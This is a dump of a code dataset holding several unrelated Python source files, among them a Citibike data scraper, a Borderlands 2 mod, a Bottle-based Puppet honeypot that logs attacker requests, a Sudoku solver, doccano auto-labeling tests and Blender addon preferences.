If image_size = None:\n use default width and height\n\n Return:\n PIL Image object\n \"\"\"\n ret = None\n for b in self:\n if b.get(\"BlockType\") == \"PAGE\":\n print(\"PAGE Block is not highlighted\")\n continue\n else:\n if ret is None:\n ret = b.image(source,outline,image_size)\n else:\n ret = b.image(ret,outline,image_size)\n return(ret)\n\n def image_show(self,source=None,outline=\"red\",image_size=None):\n \"\"\"\n Highlight and show Blocks in source document using PIL\n\n Parameters:\n source: path to image,or PIL Image object.f source = None: show \n highlight in blank plot.\n color: border color of highlighted block\n image_size: image size in pixels (width,height). If image_size = None:\n use default width and height\n \"\"\"\n image = self.image(source,outline,image_size)\n image.show()\n\n def image_save(self,path,source=None,outline=\"red\",image_size=None):\n \"\"\"\n Highlight Blocks in source document using PIL and save image to path\n\n Parameters:\n path: path to save image to.\n source: path to image,or PIL Image object.f source = None: show \n highlight in blank plot.\n color: border color of highlighted block\n image_size: image size in pixels (width,height). If image_size = None:\n use default width and height\n \"\"\"\n image = self.image(source,outline,image_size)\n image.save(path)\n","sub_path":"pyUtility/aws/textract.py","file_name":"textract.py","file_ext":"py","file_size_in_byte":35143,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"74"} +{"seq_id":"63484531","text":"#!/usr/bin/env python\n\n# To Add:\n# - write data to S3 bucket\n# - Write a log file\n\n\n\n# import libraries\nimport requests\nimport pandas as pd\nimport sqlite3\n\n# url for data on station status:\nstation_url = 'https://gbfs.citibikenyc.com/gbfs/en/station_status.json'\n\n# get json from API\nr = requests.get(station_url)\ndat = r.json() # returns dictionary\n\n# make dataframe of station data\ndf=pd.DataFrame( dat['data']['stations'] )\n\n# write raw data to csv so we can always go back later if needed\n#csv_name = '/Users/Andy/Springboard_DataScience/Capstone_1/data/feeds/' + str(pd.to_datetime(dat['last_updated'],unit='s')) + '.csv'\ncsv_name = '/Users/Andy/Projects/NYC_citibike/data/feeds/' + str(pd.to_datetime(dat['last_updated'],unit='s')) + '.csv'\ndf.to_csv(csv_name,index=False)\n\n# write the raw csv file to S3 also\n#import boto3\n#s3 = boto3.resource('s3')\n#fname = csv_name\n#key_name = 'station_status/' + str(pd.to_datetime(dat['last_updated'],unit='s')) + '.csv'\n#data = open(fname, 'rb')\n#s3.Bucket('citibikefeed').put_object(Key=key_name, Body=data)\n\n# add timestamp to rows (this is in UTC)\n# note each station also has a 'last updated'?\ntimestamp_utc = pd.to_datetime(dat['last_updated'],unit='s',utc=True)\n#timestamp_utc = pd.to_datetime(df['last_updated'],unit='s',utc=True)\n\ndf['timestamp_utc'] = timestamp_utc.to_datetime64()\n#df['timestamp_utc'] = pd.to_datetime(df['timestamp_utc'] )\n\n# also add local (NYC) time\ntimestamp_nyc = timestamp_utc.tz_convert(tz='America/New_York')\n#df['timestamp_nyc'] = timestamp_nyc.to_datetime64()\n#df['timestamp_nyc'] = pd.to_datetime(df['timestamp_nyc'])\n\n# add yearh, hour, day of year (using NY time)\n#df['year']=df.timestamp_nyc.dt.year\n#df['hour']=df.timestamp_nyc.dt.hour\n#df['yday']=df.timestamp_nyc.dt.dayofyear\ndf['year']=timestamp_nyc.year\ndf['hour']=timestamp_nyc.hour\ndf['yday']=timestamp_nyc.dayofyear\n\n# write the data to sql database\n#con = 
sqlite3.connect(\"/Users/Andy/Springboard_DataScience/Capstone_1/data/citibike_feeds.db3\")\ncon = sqlite3.connect(\"/Users/Andy/Projects/NYC_citibike/data/citibike_feeds.db3\")\ndf.to_sql(\"station_status\",con,if_exists='append',index=False)\ncon.close()\n","sub_path":"src/read_citibike_streaming.py","file_name":"read_citibike_streaming.py","file_ext":"py","file_size_in_byte":2150,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"74"} +{"seq_id":"460971179","text":"import bl2sdk\n\n\nclass Crosshair(bl2sdk.BL2MOD):\n Name = \"No Crosshair\"\n Description = \"Removes the crosshairs.\"\n Author = \"Juso\"\n\n bZoomed = False\n\n def disable_crosshair(self, caller, function, params):\n if not self.bZoomed:\n caller.bCrosshairEnabled = False\n caller.bSuppressCrosshair = True\n else:\n caller.bCrosshairEnabled = True\n caller.bSuppressCrosshair = False\n\n def handle_zooming(self, caller, function, params):\n if params.NewZoomState == 2:\n self.bZoomed = True\n caller.bCrosshairEnabled = True\n else:\n self.bZoomed = False\n caller.bCrosshairEnabled = False\n\n crosshair_hook = \"WillowWeapon.Active.BeginState\"\n zoom_hook = \"WillowGame.WillowWeapon.SetZoomState\"\n\n def Enable(self):\n bl2sdk.RegisterHook(self.crosshair_hook, \"CrosshairHook\", CrosshairHook)\n bl2sdk.RegisterHook(self.zoom_hook, \"ZoomHook\", IsZoomingHook)\n\n def Disable(self):\n bl2sdk.RemoveHook(self.crosshair_hook, \"CrosshairHook\")\n bl2sdk.RemoveHook(self.zoom_hook, \"ZoomHook\")\n\n\nCrosshairInstance = Crosshair()\n\n\ndef CrosshairHook(caller: bl2sdk.UObject, function: bl2sdk.UFunction, params: bl2sdk.FStruct) -> bool:\n CrosshairInstance.disable_crosshair(caller, function, params)\n return True\n\n\ndef IsZoomingHook(caller: bl2sdk.UObject, function: bl2sdk.UFunction, params: bl2sdk.FStruct) -> bool:\n CrosshairInstance.handle_zooming(caller, function, params)\n return True\n\nbl2sdk.Mods.append(CrosshairInstance)\n","sub_path":"NoCrosshair/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":1575,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"74"} +{"seq_id":"338593436","text":"from insert import add_stock, unsent_stocks, upcoming_stocks\nfrom telegram import publish_stock, remind_and_pin\n\n\ndef publish_stocks():\n # fetch and store new stocks before publishing to the channel\n add_stock()\n\n unpublished_stocks = list(unsent_stocks())\n if unpublished_stocks:\n from models import session\n for the_stock in unpublished_stocks:\n publish_stock(the_stock)\n session.commit()\n return print(f\"published {len(unpublished_stocks)} stocks\")\n\n\ndef remind_stock():\n upcoming_issues = list(upcoming_stocks())\n if upcoming_issues:\n for issue in upcoming_issues:\n remind_and_pin(issue)\n return print(f\"reminded about {len(upcoming_issues)} stock\")\n\n\nif __name__ == '__main__':\n publish_stocks()\n remind_stock()\n","sub_path":"stocks.py","file_name":"stocks.py","file_ext":"py","file_size_in_byte":805,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"74"} +{"seq_id":"89568282","text":"# File: HeapScript.py\n# Author: Szymon Wróbel\n\nfrom CormenHeap import CormenHeap\nfrom typing import List, Tuple, Callable\n\ndef handle_empty(heap: CormenHeap, _: List[str]) -> None:\n print(1 if heap.empty() else 0)\n\ndef handle_insert(heap: CormenHeap, tokens: List[str]) -> None:\n try:\n item = int(tokens[1])\n priority = int(tokens[2])\n heap.insert(item, priority)\n except 
ValueError:\n        print(\"Invalid input format\")\n\ndef handle_top(heap: CormenHeap, _: List[str]) -> None:\n    print(heap.top() if not heap.empty() else \"\")\n\ndef handle_pop(heap: CormenHeap, _: List[str]) -> None:\n    print(heap.pop() if not heap.empty() else \"\")\n\ndef handle_priority(heap: CormenHeap, tokens: List[str]) -> None:\n    try:\n        item = int(tokens[1])\n        priority = int(tokens[2])\n        heap.priority(item, priority)\n    except ValueError:\n        print(\"Invalid input format\")\n\ndef handle_print(heap: CormenHeap, _: List[str]) -> None:\n    print(heap.data)\n\ndef dispatch(heap: CormenHeap, tokens: List[str]) -> None:\n    actions: List[Tuple[str, Callable]] = [\n        (\"insert\", handle_insert),\n        (\"empty\", handle_empty),\n        (\"top\", handle_top),\n        (\"pop\", handle_pop),\n        (\"priority\", handle_priority),\n        (\"print\", handle_print)\n    ]\n\n    for (cmd, act) in actions:\n        if cmd == tokens[0]:\n            act(heap, tokens)\n            break\n    else:\n        print(\"Unknown command: \" + tokens[0])\n    \ndef interpret(heap: CormenHeap, input: str) -> None:\n    tokens = input.rstrip().split(' ')\n    dispatch(heap, tokens)","sub_path":"lista5/src/HeapScript.py","file_name":"HeapScript.py","file_ext":"py","file_size_in_byte":1582,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"74"} +{"seq_id":"599099653","text":"from bottle import route, run, template, request, error, response\nimport requests\nimport os.path\nimport configparser\nimport datetime\nimport codecs\nimport logging\n\nlogging.basicConfig(format='%(asctime)s : %(levelname)s : %(message)s', level=logging.INFO, filename='/var/log/puppetpot.txt')\n\n# set up logging to console\nconsole = logging.StreamHandler()\nconsole.setLevel(logging.ERROR)\n# set a format which is simpler for console use\n\nformatter = logging.Formatter('%(asctime)s : %(message)s')\nconsole.setFormatter(formatter)\nlogging.getLogger(\"\").addHandler(console)\n\n#\n# read config from a possibly existing T-Pot installation (see dtag-dev-sec.github.io)\n#\ndef getConfig():\n    if os.path.isfile('/data/ews/conf/ews.cfg'):\n        config2 = configparser.ConfigParser()\n        config2.read('/data/ews/conf/ews.cfg')\n        username = config2.get(\"EWS\", \"username\")\n        token = config2.get(\"EWS\", \"token\")\n        server = config2.get(\"EWS\", \"rhost_first\")\n        nodeid = config2.get(\"GLASTOPFV3\", \"nodeid\")\n\n        return (username, token, server, nodeid)\n    else:\n        return (None, None, None, None)\n\n#\n# log data for DTAG TPot\n#\ndef logData(attackerIP, attackerRequest, host):\n\n    if os.path.isfile('/data/ews/conf/ews.cfg'):\n\n        curDate = datetime.datetime.strftime(datetime.datetime.now(), '%Y-%m-%dT%H:%M:%S')\n\n        dumpStr = \"{\\\"timestamp\\\":\\\"\" + curDate + \"\\\",\\\"event_type\\\":\\\"alert\\\",\\\"src_ip\\\":\\\"\"+attackerIP+\"\\\",\\\"src_port\\\":0,\\\"dest_ip\\\":\\\"127.0.0.1\\\",\\\"dest_port\\\":8140,\\\"honeypot\\\":{\\\"name\\\":\\\"Elasticpot\\\",\\\"nodeid\\\":\\\"puppet\\\"}}\\r\\n\"\n\n        with open(\"/data/puppetpot/log/puppetpot.log\", \"a\") as myfile:\n            myfile.write(dumpStr)\n\n\n#\n# send the data back to the defined server (e.g. 
DTAG T-Pot environment)\n#\ndef postdata(url, content, ip):\n\n username, token, server, nodeid = getConfig()\n\n if (username == None):\n return\n\n logData(ip, url, server)\n\n nodeid = \"puppetpot-\" + nodeid\n\n txt = open(\"./templates/ews.txt\")\n xml = txt.read()\n\n out = codecs.encode(url.encode(\"UTF-8\"), 'base64_codec')\n\n xml = xml.replace(\"_IP_\", ip)\n xml = xml.replace(\"_USERNAME_\", username)\n xml = xml.replace(\"_TOKEN_\", token)\n\n xml = xml.replace(\"_URL_\", url)\n xml = xml.replace(\"_RAW_\", out.decode(\"utf-8\") )\n xml = xml.replace(\"_NODEID_\", nodeid)\n\n curDate = datetime.datetime.strftime(datetime.datetime.now(), '%Y-%m-%d %H:%M:%S')\n\n xml = xml.replace(\"_TIME_\", curDate)\n\n headers = {'Content-Type': 'application/xml'}\n requests.post(server, data=xml, headers=headers)\n\n\n#\n# retrieve IP from request\n#\ndef getIP(request):\n\n ip = request.environ.get('X-Forwarded-For')\n if ip != None:\n return ip\n\n return \"\"\n\n\n\n@error(404)\ndef error404(error):\n\n ip = getIP(request)\n\n logging.error(\"HTTP Code 404: \" + request.url + \" from ip \" + ip)\n return ''\n\n@error(500)\ndef error500(error):\n\n ip = getIP(request)\n\n logging.error(\"HTTP Code 500: \" + request.url + \" from ip \" + ip)\n\n return ''\n\n\n@route('/production/certificate_request/', method=\"GET\")\ndef handleCertificateRequestGET(node):\n\n response.content_type = 'text/plain'\n ip = getIP(request)\n\n\n # dummy code\n response.status = 200\n return \"\"\n\n@route('/production/certificate_request/', method=\"PUT\")\ndef handleCertificateRequestPUT(node):\n\n ip = getIP(request)\n logging.info(request.url+ \" from ip \" + ip)\n\n response.content_type = 'text/plain'\n postContent = \"\"\n\n for l in request.body:\n postContent += l.decode(\"utf-8\")\n\n # dummy code\n response.status = 200\n return \"\"\n\n@route('/production/certificate/', method=\"GET\")\ndef handleCertificatesCA(node):\n\n ip = getIP(request)\n logging.info(request.url + \" from ip \" + ip)\n\n response.content_type = 'text/plain'\n\n if node == 'ca':\n txt = open(\"./templates/ca.pem\")\n indexData = txt.read()\n return indexData\n# else:\n# txt = open(\"./templates/node.pem\")\n\n # dummy code\n response.status = 200\n return \"\"\n\n@route('/certificates/ca', method=\"GET\")\ndef handleCertificatesCA():\n\n ip = getIP(request)\n logging.info(request.url + \" from ip \" + ip)\n\n txt = open(\"./templates/ca.pem\")\n indexData = txt.read()\n\n return indexData\n\n\n#\n# listen to all ports to keep\n#\n\nrun(host='0.0.0.0', port=8141)","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":4433,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"74"} +{"seq_id":"593110328","text":"def solution(msg):\n dic = {}\n i = 1\n for c in 'ABCDEFGHIJKLMNOPQRSTUVWXYZ':\n dic[c] = i\n i += 1\n index = 0\n answer = []\n while index < len(msg):\n for i in range(len(msg), index, -1):\n mes = msg[index:i]\n if mes in dic:\n answer.append(dic[mes])\n if i != len(msg):\n dic[msg[index:i + 1]] = max(dic.values()) + 1\n index = i\n break\n\n return answer","sub_path":"Programmers/2018 KAKAO/압축.py","file_name":"압축.py","file_ext":"py","file_size_in_byte":486,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"74"} +{"seq_id":"463165525","text":"import pathlib\nfrom unittest.mock import patch\n\nfrom auto_labeling_pipeline.mappings import AmazonComprehendSentimentTemplate\nfrom auto_labeling_pipeline.models import 
RequestModelFactory\nfrom rest_framework import status\nfrom rest_framework.reverse import reverse\n\nfrom ...models import DOCUMENT_CLASSIFICATION, IMAGE_CLASSIFICATION\nfrom .utils import (CRUDMixin, make_auto_labeling_config, make_doc, make_image,\n prepare_project)\n\ndata_dir = pathlib.Path(__file__).parent / 'data'\n\n\nclass TestConfigParameter(CRUDMixin):\n\n def setUp(self):\n self.project = prepare_project(task=DOCUMENT_CLASSIFICATION)\n self.data = {\n 'model_name': 'GCP Entity Analysis',\n 'model_attrs': {'key': 'hoge', 'type': 'PLAIN_TEXT', 'language': 'en'},\n 'text': 'example'\n }\n self.url = reverse(viewname='auto_labeling_parameter_testing', args=[self.project.item.id])\n\n @patch('api.views.auto_labeling.AutoLabelingConfigParameterTest.send_request', return_value={})\n def test_called_with_proper_model(self, mock):\n self.assert_create(self.project.users[0], status.HTTP_200_OK)\n _, kwargs = mock.call_args\n expected = RequestModelFactory.create(self.data['model_name'], self.data['model_attrs'])\n self.assertEqual(kwargs['model'], expected)\n\n @patch('api.views.auto_labeling.AutoLabelingConfigParameterTest.send_request', return_value={})\n def test_called_with_text(self, mock):\n self.assert_create(self.project.users[0], status.HTTP_200_OK)\n _, kwargs = mock.call_args\n self.assertEqual(kwargs['example'], self.data['text'])\n\n @patch('api.views.auto_labeling.AutoLabelingConfigParameterTest.send_request', return_value={})\n def test_called_with_image(self, mock):\n self.data['text'] = str(data_dir / 'images/1500x500.jpeg')\n self.assert_create(self.project.users[0], status.HTTP_200_OK)\n _, kwargs = mock.call_args\n self.assertEqual(kwargs['example'], self.data['text'])\n\n\nclass TestTemplateMapping(CRUDMixin):\n\n def setUp(self):\n self.project = prepare_project(task=DOCUMENT_CLASSIFICATION)\n self.data = {\n 'response': {\n 'Sentiment': 'NEUTRAL',\n 'SentimentScore': {\n 'Positive': 0.004438233096152544,\n 'Negative': 0.0005306027014739811,\n 'Neutral': 0.9950305223464966,\n 'Mixed': 5.80838445785048e-7\n }\n },\n 'template': AmazonComprehendSentimentTemplate().load()\n }\n self.url = reverse(viewname='auto_labeling_template_test', args=[self.project.item.id])\n\n def test_template_mapping(self):\n response = self.assert_create(self.project.users[0], status.HTTP_200_OK)\n expected = [{'label': 'NEUTRAL'}]\n self.assertEqual(response.json(), expected)\n\n def test_json_decode_error(self):\n self.data['template'] = ''\n self.assert_create(self.project.users[0], status.HTTP_400_BAD_REQUEST)\n\n\nclass TestLabelMapping(CRUDMixin):\n\n def setUp(self):\n self.project = prepare_project(task=DOCUMENT_CLASSIFICATION)\n self.data = {\n 'response': [{'label': 'NEGATIVE'}],\n 'label_mapping': {'NEGATIVE': 'Negative'}\n }\n self.url = reverse(viewname='auto_labeling_mapping_test', args=[self.project.item.id])\n\n def test_label_mapping(self):\n response = self.assert_create(self.project.users[0], status.HTTP_200_OK)\n expected = [{'label': 'Negative'}]\n self.assertEqual(response.json(), expected)\n\n\nclass TestConfigCreation(CRUDMixin):\n\n def setUp(self):\n self.project = prepare_project(task=DOCUMENT_CLASSIFICATION)\n self.data = {\n 'model_name': 'Amazon Comprehend Sentiment Analysis',\n 'model_attrs': {\n 'aws_access_key': 'str',\n 'aws_secret_access_key': 'str',\n 'region_name': 'us-east-1',\n 'language_code': 'en'\n },\n 'template': AmazonComprehendSentimentTemplate().load(),\n 'label_mapping': {'NEGATIVE': 'Negative'}\n }\n self.url = 
reverse(viewname='auto_labeling_configs', args=[self.project.item.id])\n\n    def test_create_config(self):\n        self.assert_create(self.project.users[0], status.HTTP_201_CREATED)\n\n\nclass TestAutoLabelingText(CRUDMixin):\n\n    def setUp(self):\n        self.project = prepare_project(task=DOCUMENT_CLASSIFICATION)\n        make_auto_labeling_config(self.project.item)\n        self.example = make_doc(self.project.item)\n        self.url = reverse(viewname='auto_labeling_annotation', args=[self.project.item.id, self.example.id])\n\n    @patch('api.views.auto_labeling.execute_pipeline', return_value=[])\n    def test_text_task(self, mock):\n        self.assert_create(self.project.users[0], status.HTTP_201_CREATED)\n        _, kwargs = mock.call_args\n        self.assertEqual(kwargs['text'], self.example.text)\n\n\nclass TestAutoLabelingImage(CRUDMixin):\n\n    def setUp(self):\n        self.project = prepare_project(task=IMAGE_CLASSIFICATION)\n        make_auto_labeling_config(self.project.item)\n        filepath = data_dir / 'images/1500x500.jpeg'\n        self.example = make_image(self.project.item, str(filepath))\n        self.url = reverse(viewname='auto_labeling_annotation', args=[self.project.item.id, self.example.id])\n\n    @patch('api.views.auto_labeling.execute_pipeline', return_value=[])\n    def test_text_task(self, mock):\n        self.assert_create(self.project.users[0], status.HTTP_201_CREATED)\n        _, kwargs = mock.call_args\n        expected = str(self.example.filename)\n        self.assertEqual(kwargs['text'], expected)\n","sub_path":"backend/api/tests/api/test_auto_labeling.py","file_name":"test_auto_labeling.py","file_ext":"py","file_size_in_byte":5751,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"74"} +{"seq_id":"546431519","text":"import time\r\n\r\nclass Cell:\r\n    def __init__(self):\r\n        self.solvedNum = -1\r\n        self.__allowedNums = [True for x in range(9)]\r\n    def getAllowedNum(self, i):\r\n        return self.__allowedNums[i-1]\r\n    def setAllowedNum(self,i, b):\r\n        self.__allowedNums[i - 1] = b\r\n\r\ndef printBoard(cells):\r\n    print()\r\n    print()\r\n    for i in range(9):\r\n        for j in range(9):\r\n            print(\" \" if cells[i][j].solvedNum == -1 else cells[i][j].solvedNum, end = '')\r\n        print()\r\n    time.sleep(1)\r\n\r\ndef isCellsSolved(cells):\r\n    for arr in cells:\r\n        for c in arr:\r\n            if c.solvedNum == -1:\r\n                return False\r\n    return True\r\n\r\ndef Solve(cells):\r\n    # keep iterating until the board is solved or proven unsolvable\r\n    while not isCellsSolved(cells) and not isImpossible:\r\n        cells = SolveIter(cells)\r\n        printBoard(cells)\r\n\r\ndef SolveIter(cells):\r\n    newCells = cells\r\n    for i in range(9):\r\n        for j in range(9):\r\n            newCells = FillIn(cells, i, j)\r\n    return newCells\r\n\r\n# Fill in the cell at the specified spot\r\ndef FillIn(cells, x, y):\r\n    global isImpossible\r\n    if cells[x][y].solvedNum != -1:\r\n        return cells\r\n\r\n    # Check each Row & Column\r\n    for i in range(9):\r\n        if cells[x][i].solvedNum != -1:\r\n            cells[x][y].setAllowedNum(cells[x][i].solvedNum, False)\r\n    for i in range(9):\r\n        if cells[i][y].solvedNum != -1:\r\n            cells[x][y].setAllowedNum(cells[i][y].solvedNum, False)\r\n    #Check each 3x3 cell\r\n    for i in range(x-(x%3), 3+x-(x%3)):\r\n        for j in range(y-(y%3), 3+y-(y%3)):\r\n            if cells[i][j].solvedNum != -1:\r\n                cells[x][y].setAllowedNum(cells[i][j].solvedNum, False)\r\n\r\n    allowed = 0\r\n    allowedNum = -1\r\n    for i in range(1,10):\r\n        if cells[x][y].getAllowedNum(i):\r\n            allowed += 1\r\n            allowedNum = i\r\n    if allowed == 0:\r\n        isImpossible = True\r\n    elif allowed == 1:\r\n        cells[x][y].solvedNum = allowedNum\r\n    return cells\r\n\r\nisImpossible = False\r\npuzzle = [[Cell() for i in range(9)] for i in 
range(9)]\r\nfile = open(\"Sudoku.txt\")\r\nfor i in range(9):\r\n inputStr = file.readline()\r\n for j in range(9):\r\n c = Cell()\r\n if inputStr[j].isdigit():\r\n c.solvedNum = int(inputStr[j])\r\n puzzle[i][j] = c\r\n\r\nprintBoard(puzzle)\r\nSolve(puzzle)\r\nprintBoard(puzzle)\r\nprint(\"Done!\")","sub_path":"archive/Sudoku-Solver.py","file_name":"Sudoku-Solver.py","file_ext":"py","file_size_in_byte":2339,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"74"} +{"seq_id":"644836179","text":"# ------------------------------------------------------------------------------\n# LICENSE\n# ------------------------------------------------------------------------------\n# Render+ - Blender addon\n# (c) Copyright Diego Garcia Gangl (januz) - 2014, 2015\n# \n# ------------------------------------------------------------------------------\n# This file is part of Render+\n#\n# Render+ is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software Foundation,\n# Inc., 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301, USA.\n# ------------------------------------------------------------------------------\n\nimport os\nimport platform\n\nimport bpy\nfrom bpy.props import (IntProperty, \n StringProperty,\n BoolProperty,\n EnumProperty,\n FloatProperty,\n FloatVectorProperty,\n CollectionProperty,\n PointerProperty)\n\nfrom . 
import utils\n\n\n# ------------------------------------------------------------------------------\n# CONVENIENCE STUFF\n# ------------------------------------------------------------------------------\n\n# Addon preferences\ntry:\n    prefs = bpy.context.user_preferences.addons[__package__].preferences\nexcept KeyError:\n    prefs = None\n\n\n# ------------------------------------------------------------------------------\n# ADDON PREFERENCES\n# ------------------------------------------------------------------------------\n\n\ndef default_path_debug():\n    \"\"\" Create a useful default for support log \"\"\"\n    \n    return os.path.expanduser('~' + os.sep + 'renderplus_support.log')\n\n    \ndef make_path_sane(key):\n    \"\"\" Prevent Blender's relative paths of doom \"\"\"\n\n    if prefs[key] and prefs[key].startswith('//'):\n        prefs[key] = utils.sane_path(prefs[key])\n    elif key == 'debug_file' and prefs.debug_file == '': \n        prefs['debug_file'] = default_path_debug()\n\n\nclass RP_MT_MailQuickSetup(bpy.types.Menu):\n    bl_idname = 'wm.rp_mt_mail_quick_setup'\n    bl_label = 'Quick Setup'\n\n    def draw(self, context):\n        layout = self.layout\n\n        layout.operator(\n            'renderplus.mail_quick_setup',\n            text='Gmail').provider = 'GMAIL'\n        layout.operator(\n            'renderplus.mail_quick_setup',\n            text='Yahoo').provider = 'YAHOO'\n        layout.operator(\n            'renderplus.mail_quick_setup',\n            text='MSN/Hotmail/Live').provider = 'LIVE'\n\n\nclass RP_Preferences(bpy.types.AddonPreferences):\n\n    \"\"\" Addon preferences for Render+ \"\"\"\n\n    bl_idname = __package__\n    \n    # --------------------------------------------------------------------------\n    # NOTIFICATIONS TAB\n\n    sound_file = StringProperty(\n        name='Custom Sound for notifications',\n        description='Sound file to use for notifications',\n        subtype='FILE_PATH',\n        update=lambda a,b: make_path_sane('sound_file'),\n        default=utils.path('assets', 'notification.ogg')\n    )\n\n    sound_volume = FloatProperty(\n        name='Sound Volume',\n        description='Set the volume for sound notifications',\n        default=90.0,\n        min=0,\n        max=100.0\n    )\n\n    mail_user = StringProperty(\n        name='Username',\n        description='User to log in to the mail server',\n        default=''\n    )\n\n    mail_password = StringProperty(\n        name='Password',\n        description='Password to log in to the mail server',\n        subtype='PASSWORD',\n        default=''\n    )\n\n    mail_ssl = BoolProperty(\n        name='Use SSL',\n        description='Connect to mail server using Secure Sockets',\n        default=False,\n    )\n\n    mail_server = StringProperty(\n        name='Mail server (SMTP)',\n        description='Server to use when sending mails',\n        default=''\n    )\n\n    mail_to = StringProperty(\n        name='Send to',\n        description='Address to send mail to',\n    )\n\n    # --------------------------------------------------------------------------\n    # BATCH TAB\n\n    show_batch = BoolProperty(\n        name='Show Batch render panel',\n        description='Show Batch rendering panel in render properties',\n        default=True,\n    )\n\n    batch_refresh_interval = FloatProperty(\n        name='Refresh interval for batch panel',\n        description=('Time between refreshes in the UI panel while a batch is'\n                     ' running (in seconds).'),\n        default=1.0,\n        min=0.2,\n        max=60.0\n    )\n    \n    batch_new_dirs = BoolProperty(\n        name = 'Automatically create directories when rendering',\n        description = ('Try to create directories set in output paths' \n                       ' if they don\'t exist when rendering.'),\n        default = True,\n    )\n    \n    batch_use_custom_css = BoolProperty(\n        name = 'Use a custom CSS file for RSS feeds',\n        description = 'Use a custom stylesheet for RSS feeds',\n        default = False,\n    )\n    \n    
batch_custom_css = StringProperty(\n        name = 'Custom CSS file',\n        description = 'Custom CSS file to use for RSS Feeds',\n        default = '',\n        update=lambda a,b: make_path_sane('batch_custom_css'),\n        subtype = 'FILE_PATH',\n    )\n\n    batch_cuda_devices = IntProperty( \n        name='Amount of Cuda devices in system',\n        min=-1,\n        max=64,\n        default=-1,\n    )\n\n    batch_cuda_active = StringProperty( \n        name='Cuda device set in preferences',\n        default='',\n    )\n    \n    blender_path = StringProperty(\n        name='Custom Blender Command',\n        description=('Blender to use for batches. Type a'\n                     ' command or point this to the Blender executable.'),\n        update=lambda a,b: make_path_sane('blender_path'),\n        subtype='FILE_PATH'\n    )\n\n    term_path = StringProperty(\n        name='Custom Terminal Command',\n        description=('Terminal to use for batches. Type a'\n                     ' command or point this to a terminal executable.'),\n        update=lambda a,b: make_path_sane('term_path'),\n        subtype='FILE_PATH'\n    )\n\n    # --------------------------------------------------------------------------\n    # HELP TAB\n\n\n    enable_debug = BoolProperty(\n        name='Generate support log',\n        description=('Enable debugging output. This is used to get information'\n                     ' when reporting a bug, or requesting support.'),\n        default = False,\n    )\n\n    debug_file = StringProperty(\n        name='Support log file',\n        description='Where to save the support log output',\n        update=lambda a,b: make_path_sane('debug_file'),\n        subtype='FILE_PATH',\n        default=default_path_debug(),\n    )\n\n    ui_tab = EnumProperty(\n        name='Tab',\n        description='Tab in the preferences editor',\n        items=(('NOTIFICATIONS', 'Notifications', ''),\n               ('BATCH', 'Batch', ''),\n               ('HELP', 'Help', ''),\n               ),\n        default='NOTIFICATIONS')\n\n\n\n    def draw(self, context):\n        layout = self.layout\n\n        row = layout.row()\n        row.prop(self, 'ui_tab', expand=True)\n\n        if self.ui_tab == 'NOTIFICATIONS':\n            layout.separator()\n            layout.prop(self, 'sound_file', icon='PLAY_AUDIO')\n            row = layout.row()\n            row.label(text='Sound Volume')\n            row.prop(self, 'sound_volume', text='', slider=True)\n            layout.separator()\n            layout.separator()\n\n            split = layout.split(0.75)\n            split.label(text='Email Setup', icon='SCRIPTWIN')\n            split.menu('wm.rp_mt_mail_quick_setup')\n\n            split = layout.split(1.0)\n            col = split.column()\n            col.prop(self, 'mail_to')\n            col.separator()\n            col.prop(self, 'mail_user')\n            col.prop(self, 'mail_password')\n\n            col.prop(self, 'mail_server')\n            col.prop(self, 'mail_ssl')\n\n        elif self.ui_tab == 'BATCH':\n            layout.separator()\n            layout.prop(self, 'show_batch')\n            \n            row = layout.row()\n            row.enabled = self.show_batch\n            row.prop(self, 'batch_refresh_interval')\n            layout.separator()\n            \n            row = layout.row()\n            row.prop(self, 'batch_new_dirs')\n            \n            split = layout.split(0.4)\n            \n            col = split.column()\n            col.prop(self, 'batch_use_custom_css')\n            \n            col = split.column()\n            col.enabled = self.batch_use_custom_css\n            col.prop(self, 'batch_custom_css', text='')\n\n            \n            layout.separator()\n            layout.prop(self, 'blender_path', icon='BLENDER')\n            layout.prop(self, 'term_path', icon='CONSOLE')\n            layout.label(text=('Fill this if you want to use a different'\n                               ' Blender or Terminal for batches.'\n                               ' Leave empty to use defaults.'), icon='INFO')\n            layout.separator()\n            \n        elif self.ui_tab == 'HELP':\n            layout.prop(self, 'enable_debug')\n\n            layout.separator()\n\n            if self.enable_debug:\n                privacy = (\n                    'The debug file will contain the following information '\n                    'about your system: Operating system, Blender version and branch.')\n\n                layout.prop(self, 'debug_file')\n                layout.label(privacy, icon='INFO')\n\n            
layout.separator()\n\n\n# ------------------------------------------------------------------------------\n# BATCH OPERATOR SETTINGS\n# ------------------------------------------------------------------------------\n\n# These are settings used by operators. They are set as props here \n# so they can be shown in panels, instead of popups.\n\nsuffix_options = (\n    ('NONE', 'None', ''),\n    ('SCENE', 'Scene', ''),\n    ('RENDERLAYER', 'Render Layer', ''),\n    ('CAMERA', 'Camera', ''),\n    ) \n\nclass RP_Batch_Ops_OutputChange(bpy.types.PropertyGroup):\n\n    \"\"\" Data for Output Change \"\"\"\n    \n    # Output \n    # --------------------------------------------------------------------------\n    base_directory = StringProperty(\n        name='Base directory',\n        default='', \n        subtype='FILE_PATH'\n    )\n    \n    base_filename = StringProperty(\n        name='Base filename',\n        default='', \n    )\n\n    \n    # Suffixes for filenames\n    # --------------------------------------------------------------------------\n    name_suffix_01 = EnumProperty(\n        items= suffix_options,\n        name='First 